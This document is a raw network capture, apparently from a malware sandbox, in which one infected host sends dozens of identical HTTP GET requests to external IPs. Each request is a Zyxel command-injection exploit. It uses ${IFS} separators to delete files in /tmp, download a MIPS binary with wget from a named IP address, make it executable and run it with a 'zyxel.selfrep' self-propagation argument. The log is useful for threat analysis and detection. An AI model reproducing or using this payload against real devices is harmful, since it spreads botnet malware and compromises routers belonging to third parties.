                                                Jan 28, 2024 10:16:27.848798037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5023192.168.2.2341944122.90.39.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848840952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5024192.168.2.2341178139.172.77.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848865986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5025192.168.2.235982667.160.83.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848897934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5026192.168.2.2342500121.224.121.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848937988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5027192.168.2.2355884205.62.219.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848952055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5028192.168.2.2333184174.193.194.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848973036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5029192.168.2.235323231.108.129.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848973989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5030192.168.2.2333698139.103.88.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849014044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5031192.168.2.235179467.215.101.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849025965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5032192.168.2.233683047.150.193.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849064112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5033192.168.2.2347368204.124.66.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849101067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5034192.168.2.234976842.231.230.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849134922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5035192.168.2.2336424185.192.4.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849154949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5036192.168.2.2354454119.159.116.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849160910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5037192.168.2.2354168120.238.187.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849195004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5038192.168.2.2343562166.151.147.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849246979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5039192.168.2.2359394211.242.31.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849261045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5040192.168.2.2343956144.224.96.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849284887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5041192.168.2.2350634196.18.20.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849333048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5042192.168.2.235689683.57.136.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849335909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5043192.168.2.235629451.198.226.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849359035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5044192.168.2.2352976201.141.207.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849391937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5045192.168.2.234993844.0.75.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849430084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5046192.168.2.23369408.166.80.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849457026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5047192.168.2.233461896.193.18.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849498034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5048192.168.2.233428469.116.207.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849536896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5049192.168.2.2355492216.226.35.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849577904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5050192.168.2.234698680.156.179.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849611044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5051192.168.2.2360706188.20.160.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849632978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5052192.168.2.234172883.177.132.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849661112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5053192.168.2.2336356206.94.196.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849672079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5054192.168.2.234170693.90.127.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849675894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5055192.168.2.2348084119.33.26.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849720955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5056192.168.2.234158040.174.194.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849752903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5057192.168.2.2359566145.91.125.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849773884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5058192.168.2.2343834178.23.34.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849792957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5059192.168.2.234507444.138.86.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849826097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5060192.168.2.2347498122.5.231.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849854946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5061192.168.2.2341824220.122.57.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849870920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5062192.168.2.2337742103.43.23.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849910021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5063192.168.2.233337690.248.21.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849951982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5064192.168.2.2351672138.115.114.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.849961042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5065192.168.2.2355314206.154.228.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850018978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5066192.168.2.234553641.160.191.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850043058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5067192.168.2.234854839.176.219.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850064993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5068192.168.2.2349430212.9.86.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850091934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5069192.168.2.2359944128.170.30.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850115061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5070192.168.2.2336308187.106.249.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850145102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5071192.168.2.2342528105.117.94.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850169897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5072192.168.2.2334110183.246.196.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850195885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5073192.168.2.233959850.95.98.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850197077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5074192.168.2.2344158154.30.163.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850224018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5075192.168.2.2350264120.0.221.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850270033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5076192.168.2.2349144119.133.113.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850307941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5077192.168.2.2342934183.62.86.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850320101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5078192.168.2.2348836125.253.6.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850352049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5079192.168.2.233537812.144.202.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850377083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5080192.168.2.234827472.93.214.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850395918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5081192.168.2.2358654134.117.155.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850431919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5082192.168.2.2359736187.19.178.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850466967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5083192.168.2.23356089.81.63.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850474119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5084192.168.2.235530813.212.131.50443
                                                TimestampBytes transferredDirectionData
